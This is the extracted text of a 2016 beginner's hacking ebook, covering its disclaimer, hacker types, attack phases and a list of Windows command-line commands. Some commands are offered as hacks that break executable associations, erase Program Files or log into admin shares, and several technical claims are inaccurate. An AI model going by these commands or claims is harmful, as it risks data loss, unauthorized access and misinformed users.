H4CK3R : A Beginner’s Guide Beginner's

User Manual: Pdf

Open the PDF directly: View PDF PDF.
Page Count: 172 [warning: Documents this large are best viewed by clicking the View PDF Link!]

H4CK3R : A Beginner’s Guide
2016
Page 1
H4CK3R : A Beginner’s Guide
2016
Page 2
“KNOWLEDGE iS FREE”
www.facebook.com/H4CK3RTHEBOOK
THE HACKING SAGE : ETHICAL HACKING & IT SECURITY
Facebook.com/thehackingsage | Twitter.com/thehackingsage | Instagram.com/thehackingsage
H4CK3R : A Beginner’s Guide
2016
Page 3
H4CK3R : A Beginner’s Guide
www.facebook.com/H4CK3RTHEBOOK
THE HACKiNG SAGE : Ethical Hacking & IT Security
Contact US : +919919605516 (WhatsApp)
Facebook : www.facebook.com/thehackingsage
Twitter : www.twitter.com/thehackingsage
Instagram : www.instagram.com/thehackingsage
For More, Log On : www.thehackingsagerises.blogspot.com
H4CK3R : A Beginner’s Guide
2016
Page 4
Legal Disclaimer :
The information provided in this eBook “H4CK3R : A Beginner’s Guide” is to be used for
educational purposes only. The author holds no responsibility for any misuse of the
information provided. This book is totally meant for providing information on "Ethical
Hacking”.
While Using This Book And Reading Various Hacking Tutorials, You Agree To
Follow The Below Mentioned Terms & Conditions :
All The Information Provided In This Book Is For Educational Purposes Only.
The Book Author Is No Way Responsible For Any Misuse Of The Information.
"H4CK3R : A Beginner’s Guide” Is Just A Term That Represents The Name Of
The Book And Is Not A Book That Provides Any Illegal Information. “H4CK3R :
A Beginner’s Guide” Is A Book Related To Computer Security And Not A Book
That Promotes Hacking/Cracking/Software Piracy.
This Book Is Totally Meant For Providing Information On "Computer Security”,
"Computer Programming And Other Related Topics And Is No Way Related
Towards The Terms "Cracking” Or "Hacking” (Unethical).
Few Articles (Tutorials) In This Book May Contain The Information Related To
"Hacking Passwords” Or "Hacking Email Accounts” (Or Similar Terms). These
Are Not The Guides Of Hacking. They Only Provide Information About The
Legal Ways Of Retrieving The Passwords. You Shall Not Misuse The Information
To Gain Unauthorized Access. However You May Try Out These Hacks On Your
Own Computer At Your Own Risk. Performing Hack Attempts (Without
Permission) On Computers That You Do Not Own Is Illegal.
The Virus Creation Section In This Book Provides Demonstration On Coding
Simple Viruses Using High Level Programming Languages. These Viruses Are
Simple Ones And Cause No Serious Damage To The Computer. However We
Strongly Insist That These Information Shall Only Be Used To Expand
Programming Knowledge And Not For Causing Malicious Attacks.
All The Information In This Book Is Meant For Developing Hacker Defense
Attitude Among The Readers And Help Preventing The Hack Attacks. “H4CK3R
: A Beginner’s Guide” Insists That This Information Shall Not Be Used For
Causing Any Kind Of Damage Directly Or Indirectly. However You May Try
These Codes On Your Own Computer At Your Own Risk.
The Word "Hack” Or "Hacking” That Is Used In This Book Shall Be Regarded As
"Ethical HackOr "Ethical HackingRespectively. & We Believe Only In White
Hat Hacking. On The Other Hand We Condemn Black Hat Hacking.
Most Of The Information Provided In This Book Are Simple Computer Tricks
(May Be Called By The Name Hacks) And Are No Way Related To The Term
Hacking & Some Of The Tricks Provided By Us May No Longer Work Due To
Fixture In The Bugs That Enabled The Exploits. We Are Not Responsible For
Any Direct Or Indirect Damage Caused Due To The Usage Of The Hacks
Provided In The Book..
H4CK3R : A Beginner’s Guide
2016
Page 5
Acknowledgements :
“For Any Successful Work, It Owes To Thank Many”
Book "H4CK3R : A Beginner’s GuideIs Tremendously Complex To Write, Particularly
Without Support Of The Almighty GOD. I Express Heartfelt Credit To My Parents
Without Them I Have No Existence. I Am More Than Ever Thankful To Google &
Thankful To All Hacking Sites & Blogs For The Inspiration Which I Got For Learning
Hacking And Getting Such Great Opportunity To Write The Book. I Am Also Thankful
To My Sister Mahi & My Friends To Helped Me To Complete This Book..
Specially Thanks To & My BFF Sumedha & Thanks To Eminem, Lil Wayne, Naruto &
Goku.. Taught Me To Never Give Up.. :)
To Finish, I Am Thankful To You Also As You Are Reading This Book. I Am Sure This
Will Book Make Creative And Constructive Role To Build Your Life More Secure And
Alert Than Ever Before..
- Vipul Tiwari (Author)
H4CK3R : A Beginner’s Guide
2016
Page 6
About The Author :
Vipul Tiwari Is An Ethical Hacker, Famous For His Blog THE HACKiNG SAGE.
He started his career at a very young age of 17 since then he has performed the roles of
Experienced Ethical Hacker, Cyber Security Expert, and Penetration Tester.
He Is Also Providing The Services Like Ethical Hacking Training And Workshops,
Network Security, System Security, Website Development and Maintenance & Security
Consultant..
Facebook : www.facebook.com/hackervipul
Twitter : www.twitter.com/vipultiwari007
Instagram : www.instagram.com/thehackingsage
H4CK3R : A Beginner’s Guide
2016
Page 7
About The Book :
The Goal Of This Book Is To Introduce To People The True Philosophy And Ethics Of
The Elusive World Of Hacking. I Will Show You Everything There Is To Show In
Hacking. Every Single Hacking Technique That Exists, How It Works And How To
Actually Carry Them Out Yourself. You Will Get To Know How To Protect Yourself
From These Same Hacks And Eventually I Hope To Clear The Bad Name That Has
Been Given To Hackers Around The Globe.
So, Your Journey Begins Right Here, Right Now..
Facebook : www.facebook.com/H4CK3RTHEBOOK
Blog : www.thehackingsagerises.blogspot.com
H4CK3R : A Beginner’s Guide
2016
Page 8
Table of Contents :
1. Concept Of Ethical Hacking. ......................................................................................... 10
2. How To Become A Ethical Hacker? ............................................................................... 17
3. DOS Hacking & Commands .......................................................................................... 20
4. Registry & Group Policy Editor In Windows ................................................................ 28
5. Windows Tricks & Hacks .............................................................................................. 31
6. Change & Hide IP Address ........................................................................................... 45
7. Change MAC Address? .................................................................................................. 48
8. System Password Cracking ........................................................................................... 49
9. Backdoor ........................................................................................................................ 51
10. Software Hacking ........................................................................................................ 52
11. Keylogger ..................................................................................................................... 54
12. Trojans ......................................................................................................................... 56
13. Cross Site Scripting (XSS) ........................................................................................... 60
14. Phishing ....................................................................................................................... 64
15. Sniffers ......................................................................................................................... 67
16. Email Hacking ............................................................................................................. 70
17. Hack Facebook Accounts and Passwords .................................................................... 77
18. Google Hacking ............................................................................................................ 82
19. Wireless Hacking ......................................................................................................... 90
20. WiFi Hacking (WPA/WPA2 & WEP) ........................................................................... 95
21. Website Hacking ........................................................................................................ 105
22. Linux Hacking ........................................................................................................... 109
23. Best Operating System For Penetration Testing / Hacking ..................................... 117
24. Mobile Hacking (SMS & Call) ................................................................................... 128
25. Android Hacking ........................................................................................................ 134
BONUS
List of Windows Shortcuts .............................................................................................. 139
List of PC File Extensions ............................................................................................... 143
A History Of Hacking ...................................................................................................... 158
H4CK3R : A Beginner’s Guide
2016
Page 9
H4CK3R : A Beginner’s Guide
2016
Page 10
1. Concept Of Ethical Hacking.
What is Hacking?
The Art of exploring various security breaches is termed as Hacking. Computer Hackers
have been around for so many years. Since the Internet became widely used in the
World, We have started to hear more and more about hacking. Only a few Hackers, such
as Kevin Mitnick, are well known.
In a world of Black and White, it’s easy to describe the typical Hacker. A general outline
of a typical Hacker is an Antisocial, Pimple-faced Teenage boy. But the Digital world
has many types of Hackers.
Hackers are human like the rest of us and are, therefore, unique individuals, so an exact
profile is hard to outline. The best broad description of Hackers is that all Hackers
aren’t equal. Each Hacker has Motives, Methods and Skills. But some general
characteristics can help you understand them. Not all Hackers are Antisocial,
Pimplefaced Teenagers. Regardless, Hackers are curious about Knowing new things,
Brave to take steps and they are often very Sharp Minded.
What is Hacker?
Traditionally, a Hacker is someone who likes to play with Software or Electronic
Systems. Hackers enjoy Exploring and Learning how Computer systems operate. They
love discovering new ways to work electronically.
Recently, Hacker has taken on a new meaning someone who maliciously breaks into
systems for personal gain. Technically, these criminals are Crackers as Criminal
Hackers. Crackers break into systems with malicious intentions. They do it for Personal
gain, Fame, Profit and even Revenge. They Modify, Delete and Steal critical
information, often making other people's life miserable.
Hacking has a lot of meanings depending upon the person’s knowledge and his work
intentions. Hacking is an Art as well as a Skill. Hacking is the knowledge by which one
gets to achieve his Goals, anyhow, using his Skills and Power.
Most people associate Hacking with breaking law, therefore calling all those guys who
engage in hacking activities to be criminals. We agree that there are people out there
who use hacking techniques to break the law, but hacking is not really about that. In
fact, hacking is more about following the law and performing the steps within the limits.
Hacker vs. Cracker
What Is the Difference Between a Hacker and a Cracker ?
Many articles have been written about the difference between Hackers and crackers,
which attempt to correct public misconceptions about hacking. For many years, media
has applied the word Hacker when it really means Cracker. So the public now believe
H4CK3R : A Beginner’s Guide
2016
Page 11
that a Hacker is someone who breaks into computer systems and steal confidential data.
This is very untrue and is an insult to some of our most talented Hackers.
There Are Various Points To Determine The Difference Between Hackers And
Crackers..
A Hacker is a person who is interested in the working of any computer Operating
system. Most often, Hackers are programmers. Hackers obtain advanced knowledge of
operating systems and programming languages. They may know various security holes
within systems and the reasons for such holes. Hackers constantly seek further
knowledge, share what they have discovered, and they never have intentions about
damaging or stealing data.
A Cracker is a person who breaks into other people systems, with malicious intentions.
Crackers gain unauthorized access, destroy important data, stop services provided by
the server, or basically cause problems for their targets. Crackers can easily be
identified because their actions are malicious.
Whatever the case, most people give Hacker a negative outline. Many malicious Hackers
are electronic thieves. Just like anyone can become a thief, or a robber, anyone can
become a Hacker, regardless of age, gender, or religion. Technical skills of Hackers vary
from one to another. Some Hackers barely know how to surf the Internet, whereas
others write software that other Hackers depend upon..
Types Of Hackers
Let’s See The Categories Of Hackers On The Basis On Their Knowledge. :
Coders : The Real Hackers are the Coders, the ones who revise the methods and create
tools that are available in the market. Coders can find security holes and weaknesses in
software to create their own exploits. These Hackers can use those exploits to develop
fully patched and secure systems.
Coders are the programmers who have the ability to find the unique vulnerability in
existing software and to create working exploit codes. These are the individuals with a
deep understanding of the OSI Layer Model and TCP/IP Stacks.
Admins : Admins are the computer guys who use the tools and exploits prepared by the
coders. They do not develop their own techniques, however they uses the tricks which
are already prepared by the coders. They are generally System Administration, or
Computer Network Controller. Most of the Hackers and security person in this digital
world come under this category.
Admins have experience with several operating systems, and know how to exploit
several existing vulnerabilities. A majority of Security Consultants fall in this group and
work as a part of Security Team.
Script Kiddies : Next and the most dangerous class of Hackers is Script kiddies, They
are the new generation of users of computer who take advantage of the Hacker tools and
documentation available for free on the Internet but don’t have any knowledge of what’s
going on behind the scenes. They know just enough to cause you headaches but typically
are very sloppy in their actions, leaving all sorts of digital fingerprints behind. Even
though these guys are the teenage Hackers that you hear about in the news media, they
need minimum skills to carry out their attacks.
H4CK3R : A Beginner’s Guide
2016
Page 12
Script Kiddies are the bunnies who use script and programs developed by others to
attack computer systems and Networks. They get the least respect but are most
annoying and dangerous and can cause big problems without actually knowing what
they are doing.
Types Of Hackers On The Basis Of Activities Performed By Them. :
White Hat Hacker : A White Hat Hacker is computer guy who perform Ethical
Hacking. These are usually security professionals with knowledge of hacking and the
Hacker toolset and who use this knowledge to locate security weaknesses and
implement counter measures in the resources.
They are also known as an Ethical Hacker or a Penetration Tester. They focus on
Securing and Protecting IT Systems.
Black Hat Hacker : A Black Hat Hacker is computer guy who performs Unethical
Hacking. These are the Criminal Hackers or Crackers who use their skills and
knowledge for illegal or malicious purposes. They break into or otherwise violate the
system integrity of remote machines, with malicious intent.
These are also known as an Unethical Hacker or a Security Cracker. They focus on
Security Cracking and Data stealing.
Grey Hat Hacker : A Grey Hat Hacker is a Computer guy who sometimes acts legally,
sometimes in good will, and sometimes not. They usually do not hack for personal gain
or have malicious intentions, but may or may not occasionally commit crimes during the
course of their technological exploits. They are hybrid between White Hat and Black Hat
Hackers.
Ethical Hacking
Ethical Hacking is testing the resources for a good cause and for the betterment of
technology. Technically Ethical Hacking means penetration testing which is focused on
Securing and Protecting IT Systems.
Hactivism
Another type of Hackers are Hacktivists, who try to broadcast political or social
messages through their work. A Hacktivist wants to raise public awareness of an issue.
Examples of hacktivism are the Web sites that were defaced with the Jihad messages in
the name of Terrorism.
Cyber Terrorist
There are Hackers who are called Cyber Terrorists, who attack government computers
or public utility infrastructures, such as power stations and air-traffic-control towers.
They crash critical systems or steal classified government information. While in a
conflict with enemy countries some government start Cyber war via Internet.
Why Hackers Hack?
The main reason why Hackers hack is because they can hack. Hacking is a casual hobby
for some Hackers they just hack to see what they can hack and what they can’t hack,
usually by testing their own systems. Many Hackers are the guys who get kicked out of
H4CK3R : A Beginner’s Guide
2016
Page 13
corporate and government IT and security organizations. They try to bring down the
status of the organization by attacking or stealing information.
The knowledge that malicious Hackers gain and the ego that comes with that knowledge
is like an addiction.Some Hackers want to make your life miserable, and others simply
want to be famous. Some common motives of malicious Hackers are revenge, curiosity,
boredom, challenge, theft for financial gain, blackmail, extortion, and corporate work
pressure.
Many Hackers say they do not hack to harm or profit through their bad activities, which
helps them justify their work. They often do not look for money full of pocket. Just
proving a point is often a good enough reward for them.
Prevention From Hackers
What Can Be Done To Prevent Hackers From Finding New Holes In Software
And Exploiting Them ?
1. Information security research teams existto try to find these holes and notify
vendors before they are exploited. There is a beneficial competition occurring
between the Hackers securing systems and the Hackers breaking into those
systems. This competition provides us with better and stronger security, as well
as more complex and sophisticated attack techniques.
2. Defending Hackers create Detection Systems to track attacking Hackers, while
the attacking Hackers develop bypassing techniques, which are eventually
resulted in bigger and better detecting and tracking systems. The net result of
this interaction is positive, as it produces smarter people, improved security,
more stable software, inventive problem-solving techniques, and even a new
economy.
3. Now when you need protection from Hackers, whom you want to call, “The
Ethical Hackers”. An Ethical Hacker possesses the skills, mindset, and tools of a
Hacker but is also trustworthy. Ethical Hackers perform the hacks as security
tests computer systems.
4. Ethical Hacking also known as Penetration Testing or White-Hat Hacking
involves the same Tools, Tricks and Techniques that Hackers use, but with one
major difference:
5. Ethical hacking is Legal.
6. Ethical hacking is performed with the target’s permission. The intent of Ethical
Hacking is to discover vulnerabilities from a Hacker’s viewpoint so systems can
be better secured. Ethical Hacking is part of an overall information Risk
Management program that allows for ongoing security improvements. Ethical
hacking can also ensure that vendors’ claims about the security of their products
are legitimate.
7. As Hackers expand their knowledge, so should you. You must think like them to
protect your systems from them.You, as the ethical Hacker, must know activities
Hackers carry out and how to stop their efforts. You should know what to look for
and how to use that information to thwart Hackers’ efforts.
H4CK3R : A Beginner’s Guide
2016
Page 14
8. You don’t have to protect your systems from everything. You can’t.
The Only Protection Against Everything Is To Unplug Your Computer Systems And
Lock Them Away So No One Can Touch Them - Not Even You.
That’s not the best approach to information security. What’s important is to protect your
systems from known Vulnerabilities and common Hacker attacks.
It’s impossible to overcome all possible vulnerabilities of your systems. You can’t plan
for all possible attacks especially the ones that are currently unknown which are
called Zero Day Exploits. These are the attacks which are not known to the world.
However in Ethical Hacking, the more combinations you try the more you test whole
systems instead of individual units the better your chances of discovering
vulnerabilities.
Steps Performed By Hackers :
1) Reconnaissance
2) Scanning
3) Gaining Access
4) Maintaining Access
5) Clearing Tracks
Performing Reconnaissance
Scanning and Enumeration
Gaining access
Maintaining access and Placing Backdoors
Covering tracks or Clearing Logs
Reconnaissance
Reconnaissance can be described as the pre-attack phase and is a systematic attempt to
locate, gather, identify, and record information about the target. The Hacker seeks to
find out as much information as possible about the target.
Scanning and Enumeration
Scanning and enumeration is considered the second pre-attack phase. This phase
involves taking the information discovered during reconnaissance and using it to
examine the network. Scanning involves steps such as intelligent system port scanning
which is used to determine open ports and vulnerable services. In this stage the attacker
can use different automated tools to discover system vulnerabilities.
Gaining Access
This is the phase where the real hacking takes place. Vulnerabilities discovered during
the reconnaissance and scanning phase are now exploited to gain access. The method of
connection the Hacker uses for an exploit can be a local area network, local access to a
PC, the Internet, or offline. Gaining access is known in the Hacker world as owning the
system. During a real security breach it would be this stage where the Hacker can
utilize simple techniques to cause irreparable damage to the target system.
H4CK3R : A Beginner’s Guide
2016
Page 15
Maintaining Access and Placing Backdoors
Once a Hacker has gained access, they want to keep that access for future exploitation
and attacks. Sometimes, Hackers harden the system from other Hackers or security
personnel by securing their exclusive access with Backdoors, Root kits, and Trojans.
The attacker can use automated scripts and automated tools for hiding attack evidence
and also to create backdoors for further attack.
Clearing Tracks
In this phase, once Hackers have been able to gain and maintain access, they cover their
tracks to avoid detection by security personnel, to continue to use the owned system, to
remove evidence of hacking, or to avoid legal action. At present, many successful
security breaches are made but never detected. This includes cases where firewalls and
vigilant log checking were in place.
Working Of An Ethical Hacker :
Obeying The Ethical Hacking Commandments
Every Ethical Hacker must follow few basic principles. If he do not follow, bad things
can happen. Most of the time these principles get ignored or forgotten when planning or
executing ethical hacking tests. The results are even very dangerous.
Working Ethically
The word ethical can be defined as working with high professional morals and
principles. Whether you’re performing ethical hacking tests against your own systems or
for someone who has hired you, everything you do as an ethical Hacker must be
approved and must support the company’s goals. No hidden agendas are allowed!
Trustworthiness is the ultimate objective. The misuse of information is absolutely not
allowed. That’s what the bad guys do.
Respecting Privacy
Treat the information you gather with complete respect. All information you obtain
during your testing from Web application log files to clear-text passwords must be
kept private.
Not Crashing Your Systems
One of the biggest mistakes is when people try to hack their own systems; they come up
with crashing their systems. The main reason for this is poor planning. These testers
have not read the documentation or misunderstand the usage and power of the security
tools and techniques.
You can easily create miserable conditions on your systems when testing. Running too
many tests too quickly on a system causes many system lockups. Many security
assessment tools can control how many tests are performed on a system at the same
time. These tools are especially handy if you need to run the tests on production systems
during regular business hours.
H4CK3R : A Beginner’s Guide
2016
Page 16
Executing The Plan
In Ethical hacking, Time and patience are important. Be careful when you’re performing
your ethical hacking tests.A Hacker in your network or an employee looking over your
shoulder may watch what’s going on. This person could use this information against
you. It’s not practical to make sure that no Hackers are on your systems before you
start. Just make sure you keep everything as quiet and private as possible. This is
especially critical when transmitting and storing your test results. You’re now on a
reconnaissance mission. Find as much information as possible about your organization
and systems, which is what malicious Hackers do. Start with a broad view of mind and
narrow your focus. Search the Internet for your organization’s name, your computer and
network system names, and your IP addresses. Google is a great place to start for this.
Don’t take ethical hacking too far, though. It makes little sense to harden your systems
from unlikely attacks. For instance, if you don’t have a internal Web server running, you
may not have to worry too much about. However, don’t forget about insider threats from
malicious employees or your friends or colleagues!
Fundamental Of Hacking
Hacking depends on the basic knowledge of computer system as well as the basic
knowledge of software.
To hack something, some fundamental may be used by which you can do hacking easily.
1. Firstly try to know about your target/destination.
2. Try to get more information about target. This process is also called "Social
Engineering". Any emotional or social method may be used in 'Social ENG'.
3. If Hacking may be done with the help of any software then use the software and
hacked it.
4. If no software is provided for this, gain the logical method of hacking that must
be related to your target. Try to relate this logic to the information, got by 'Social
ENG'.
5. Then use your logical method according to condition. If condition is not in your
favour, try to create condition.
6. Use your logic according to condition and try hacking process.
Except these, more about fundamental of hacking will be described in further study..
...
H4CK3R : A Beginner’s Guide
2016
Page 17
2. How To Become A Ethical Hacker?
Now most of hear the word hacker and fear strikes, anger strikes in our minds. It is
generally because a hacker is misunderstood guy in society. Not all hackers are bad,
there are three types of hackers :
Black Hat | Bad Hacker
Grey Hat | Both Good And Bad
White Hat | Good Hacker
Now here I have a good lists to guide you how to become a hacker. Follow them and
fulfill your dream.
Operating Systems (Specifically Linux/Unix) :
A true hacker totally depends on open source and freeware . Also operating systems
Linux/Unix OS(s) are best to learn hacking and also to hack anything.
A hacker must have a good knowledge of Linux Operating Systems like : Red Hat, Kali
Liux, Debian, Back Box. Its very important to learn more than one Linux Operating
System.
Programming :
It is important for a person in the hacking field to learn more than one programming.
There are many programming languages to learn such as Python, JAVA, C++. Free
tutorials are easily available online over the internet. Specifically in hacking field
languages like C++, Python, SQL etc. are very important.
Cryptography :
Now this is where the things get interesting, you are a hacker and you are transferring
files over internet to your pal and another hacker breaks in and takes your file and now
he know everything, to prevent this you need to master the art of cryptography. Look for
cryptography tutorial over internet and learn it.
Networking Concepts :
You need to be good at networking concepts and understand how the networks are
created. You need to know the differences between different types of networks and must
have a clear understanding of TCP/IP and UDP to exploit loop holes in a
system. Understanding what LAN, WAN, VPN, Firewall is also important. You must
have a clear understanding and use of network tools such as Wireshark, NMAP for
packet analyzing, network scanning etc.
Learn A Lot :
Visit websites which teach hacking and networking exploitation signup on hacking
forum ask help discuss with other hacker. Learn from expert hacker. Learn about
H4CK3R : A Beginner’s Guide
2016
Page 18
phishing, sniffer, Trojans, RATs etc. Also learn good amount of batch programming and
shell programming.
Practice :
After learning few programming concepts or OS concepts sit and practice them. Set up
you own Hacker Lab with a good system with good processor and RAM because your
regular system won’t handle hacking too smoothly.
Find/ Write Vulnerabilities :
Vulnerability is the weakness or a loop hole or open door through which you enter the
system. Look for vulnerabilities by scanning the system, network etc. Try to write your
own vulnerability programs and exploit the system.
Become A Certified Ethical Hacker
The Certified Ethical Hacker program is the pinnacle of the most desired information
security training program any information security professional will ever want to be in.
To master the hacking technologies, you will need to become one, but an ethical one! The
accredited course provides the advanced hacking tools and techniques used by hackers
and information security professionals alike to break into an organization. As we put
it, “to beat a hacker, you need to think like a hacker”. This course will immerse
you into the hacker mindset so that you will be able to defend against future attacks.
The security mindset in any organization must not be limited to the silos of a certain
vendor, technologies or pieces of equipment.
Certified Ethical Hacker program by EC Council :
https://www.eccouncil.org/Certification/certified-ethical-hacker
in this book i’ll teach you some lil stuffs that will help you to become an Ethical Hacker..
...
H4CK3R : A Beginner’s Guide
2016
Page 19
H4CK3R : A Beginner’s Guide
2016
Page 20
3. DOS Hacking & Commands
DOS (Disc Operating System) is an operating system that works on the concept of
command user interface. We have to use some commands to work with DOS.
Now, we have many operating systems like windows xp, vista, 7, 8 & 10 that works on
the concept of graphic user interface, we can work using commands on above operating
system by using an application called cmd.
Window key + r > type cmd > hit enter.
There are some commands which are used in ethical hacking..
Assoc : it is used to lock all exe of system : assoc.exe=anyname
To unlock all exe of system : assoc.exe=exefile
Ipconfig : it is used to know the ip address of self system.
Ping : it is used to get the ip address of any other system. : ping www.sitename.com
Getmac : it is used to get mac address of any other system.
TCP/IP : TCP/IP stands for transmission control protocol/Internet protocol. As you can
guess by the name, TCP/IP is the protocol under which the Internet runs. along with
user datagram protocol (UDP). So when you are connected to the Internet, you can try
these commands against other Internet computers. Most local area networks also use
TCP/IP.
Some TCP/IP Commands :
telnet
netstat
nslookup
tracert
ping
ftp
NetBIOS : NetBIOS (Net Basic Input/Output System) protocol is another way to
communicate between computers. This is often used by Windows computers, and by
Unix/Linux type computers running Samba. You can often use NetBIOS commands over
the Internet (being carried inside of, so to speak, TCP/IP). In many cases, however,
NetBIOS commands will be blocked by firewalls. Also, not many Internet computers run
NetBIOS because it is so easy to break in using them.
H4CK3R : A Beginner’s Guide
2016
Page 21
* Netstat = view the stats of the computers one feature is to get people’s i.p. for more
type netstat/?
* fsutil and fsutil fsinfo = shows you things like list of all drives
* ipconfig or ipconfig/all = shows you i.p. and all others in a network
* erase c:\program files = erases all program files or leave just the c delete everything
* nbtstat = getting information on your computer and others
* tree = displays all files on program files and desktop good for seeing if you have any
keyloggers
* tracert (ip) = to see if the i.p. exist
* net use c: \\pcname\c$ /user: pcname\administrator = to sign in as an administrator
that’s not signed in
* nslookup set exp:hotmail.com = getting ips from web sites
* /whois (screename) = only on a chat room, to find information a that person which
owns the screename an i.p.
For Use In Command Prompt For Path Chanching :
* diskpart = shows you stuff like the computer name and Takes you to disk part option
* cd\progra~1 enter then dir = programs installed (2)
* cd \windows \system = to look for stuff in this folders
* telnet : remote controlling
* net start messenger = start net send when it is disable For use in command prompt
only on a network or hacking
* bootcfg = you can make changes to boot the computer, Boot it mess it up
* gpresult = shows all the information of a computer
* driverquery = list of drives and their properties
* getmac = this gets the mac (media access control) address
* netsh = good for hacking a network configuration tool Type netsh /? For more
* openfiles = only for windows professional allows an Administrator to display or
disconnect open files
* reg = the console registry tool
* systeminfo = info
* tasklist and taskkill = like presing ctrl+alt+delete
Some DOS Commands :
ADDUSERS Helps Add or list users to/from a CSV file
ARP Address Resolution Protocol
ASSOC Change file extension associations
ASSOCIAT One step file association
AT Schedule a command to run at a later time
ATTRIB Change file attributes
BOOTCFG Edit Windows boot settings
BROWSTAT Get domain, browser and PDC info
CACLS Change file permissions
CALL Call one batch program from another
CD Change Directory move to a specific Folder
CHANGE Change Terminal Server Session properties
CHKDSK Check Disk check and repair disk problems
CHKNTFS Check the NTFS file system
CHOICE Accept keyboard input to a batch file
H4CK3R : A Beginner’s Guide
2016
Page 22
CIPHER Encrypt or Decrypt files/folders *
CleanMgr Automated cleanup of Temp files, recycle bin
CLEARMEM Clear memory leaks
CLIP Copy STDIN to the Windows clipboard.
CLS Clear the screen
CLUSTER Windows Clustering
CMD Start a new CMD shell
COLOR Change colors of the CMD window
COMP Compare the contents of two files or sets of files
COMPACT Compress files or folders on an NTFS partition
COMPRESS Compress individual files on an NTFS partition
CON2PRT Connect or disconnect a Printer
CONVERT Convert a FAT drive to NTFS.
COPY Copy one or more files to another location
CSVDE Import or Export Active Directory data
DATE Display or set the date
Dcomcnfg DCOM Configuration Utility
DEFRAG Defragment hard drive
DEL Delete one or more files
DELPROF Delete NT user profiles
DELTREE Delete a folder and all subfolders
DevCon Device Manager Command Line Utility
DIR Display a list of files and folders
DIRUSE Display disk usage
DISKCOMP Compare the contents of two floppy disks
DISKCOPY Copy the contents of one floppy disk to another
DNSSTAT DNS Statistics
DOSKEY Edit command line, recall commands, and create macros
DSADD Add user (computer, group..) to active directory
DSQUERY List items in active directory
DSMOD Modify user (computer, group..) in active directory
ECHO Display message on screen
ENDLOCAL End localisation of environment changes in a batch file
ERASE Delete one or more files
EXIT Quit the CMD shell
EXPAND Uncompress files
EXTRACT Uncompress CAB files
FC Compare two files
FDISK Disk Format and partition
FIND Search for a text string in a file
FINDSTR Search for strings in files
FOR Loop command: all options Files, Directory, List
FORFILES Batch process multiple files
FORMAT Format a disk
FREEDISK Check free disk space (in bytes)
FSUTIL File and Volume utilities
FTP File Transfer Protocol
FTYPE Display or modify file types used in file extension associations
GLOBAL Display membership of global groups
GOTO Direct a batch program to jump to a labelled line
HELP Online Help
HFNETCHK Network Security Hotfix Checker
H4CK3R : A Beginner’s Guide
2016
Page 23
IF Conditionally perform a command
IFMEMBER Is the current user in an NT Workgroup
IPCONFIG Configure IP
KILL Remove a program from memory
LABEL Edit a disk label
LOCAL Display membership of local groups
LOGEVENT Write text to the NT event viewer.
LOGOFF Log a user off
LOGTIME Log the date and time in a file
MEM Display memory usage
MD Create new folders
MODE Configure a system device
MORE Display output, one screen at a time
MOUNTVOL Manage a volume mount point
MOVE Move files from one folder to another
MOVEUSER Move a user from one domain to another
MSG Send a message
MSIEXEC Microsoft Windows Installer
MSINFO Windows NT diagnostics
MSTSC Terminal Server Connection (Remote Desktop Protocol)
MUNGE Find and Replace text within file(s)
MV Copy in-use files
NET Manage network resources
NETDOM Domain Manager
NETSH Configure network protocols
NETSVC Command-line Service Controller
NBTSTAT Display networking statistics (NetBIOS over TCP/IP)
NETSTAT Display networking statistics (TCP/IP)
NOW Display the current Date and Time
NSLOOKUP Name server lookup
NTBACKUP Backup folders to tape
NTRIGHTS Edit user account rights
PATH Display or set a search path for executable files
PATHPING Trace route plus network latency and packet loss
PAUSE Suspend processing of a batch file and display a message
PERMS Show permissions for a user
PERFMON Performance Monitor
PING Test a network connection
POPD Restore the previous value of the current directory saved by PUSHD
PORTQRY Display the status of ports and services
PRINT Print a text file
PRNCNFG Display, configure or rename a printer
PRNMNGR Add, delete, list printers set the default printer
PROMPT Change the command prompt
PsExec Execute process remotely
PsFile Show files opened remotely
PsGetSid Display the SID of a computer or a user
PsInfo List information about a system
PsKill Kill processes by name or process ID
PsList List detailed information about processes
PsLoggedOn Who’s logged on (locally or via resource sharing)
PsLogList Event log records
H4CK3R : A Beginner’s Guide
2016
Page 24
PsPasswd Change account password
PsService View and control services
PsShutdown Shutdown or reboot a computer
PsSuspend Suspend processes
PUSHD Save and then change the current directory
QGREP Search file(s) for lines that match a given pattern.
RASDIAL Manage RAS connections
RASPHONE Manage RAS connections
RECOVER Recover a damaged file from a defective disk.
REG Read, Set or Delete registry keys and values
REGEDIT Import or export registry settings
REGSVR32 Register or unregister a DLL
REGINI Change Registry Permissions
REM Record comments (remarks) in a batch file
REN Rename a file or files.
REPLACE Replace or update one file with another
RD Delete folder(s)
RDISK Create a Recovery Disk
RMTSHARE Share a folder or a printer
ROBOCOPY Robust File and Folder Copy
ROUTE Manipulate network routing tables
RUNAS Execute a program under a different user account
RUNDLL32 Run a DLL command (add/remove print connections)
SC Service Control
SCHTASKS Create or Edit Scheduled Tasks
SCLIST Display NT Services
ScriptIt Control GUI applications
SET Display, set, or remove environment variables
SETLOCAL Control the visibility of environment variables
SETX Set environment variables permanently
SHARE List or edit a file share or print share
SHIFT Shift the position of replaceable parameters in a batch file
SHORTCUT Create a windows shortcut (.LNK file)
SHOWGRPS List the NT Workgroups a user has joined
SHOWMBRS List the Users who are members of a Workgroup
SHUTDOWN Shutdown the computer
SLEEP Wait for x seconds
SOON Schedule a command to run in the near future
SORT Sort input
START Start a separate window to run a specified program or command
SU Switch User
SUBINACL Edit file and folder Permissions, Ownership and Domain
SUBST Associate a path with a drive letter
SYSTEMINFO List system configuration
TASKLIST List running applications and services
TIME Display or set the system time
TIMEOUT Delay processing of a batch file
TITLE Set the window title for a CMD.EXE session
TOUCH Change file timestamps
TRACERT Trace route to a remote host
TREE Graphical display of folder structure
TYPE Display the contents of a text file
H4CK3R : A Beginner’s Guide
2016
Page 25
USRSTAT List domain usernames and last login
VER Display version information
VERIFY Verify that files have been saved
VOL Display a disk label
WHERE Locate and display files in a directory tree
WHOAMI Output the current UserName and domain
WINDIFF Compare the contents of two files or sets of files
WINMSD Windows system diagnostics
WINMSDP Windows system diagnostics II
WMIC WMI Commands
XCACLS Change file permissions
XCOPY Copy files and folders
Some Importent DOS Commands :
Accessibility Controls = access.cpl
Add Hardware Wizard = hdwwiz.cpl
Add/Remove Programs = appwiz.cpl
Administrative Tools = control admintools
Automatic Updates = wuaucpl.cpl
Bluetooth Transfer Wizard = fsquirt
Calculator = calc
Certificate Manager = certmgr.msc
Character Map = charmap
Check Disk Utility = chkdsk
Clipboard Viewer = clipbrd
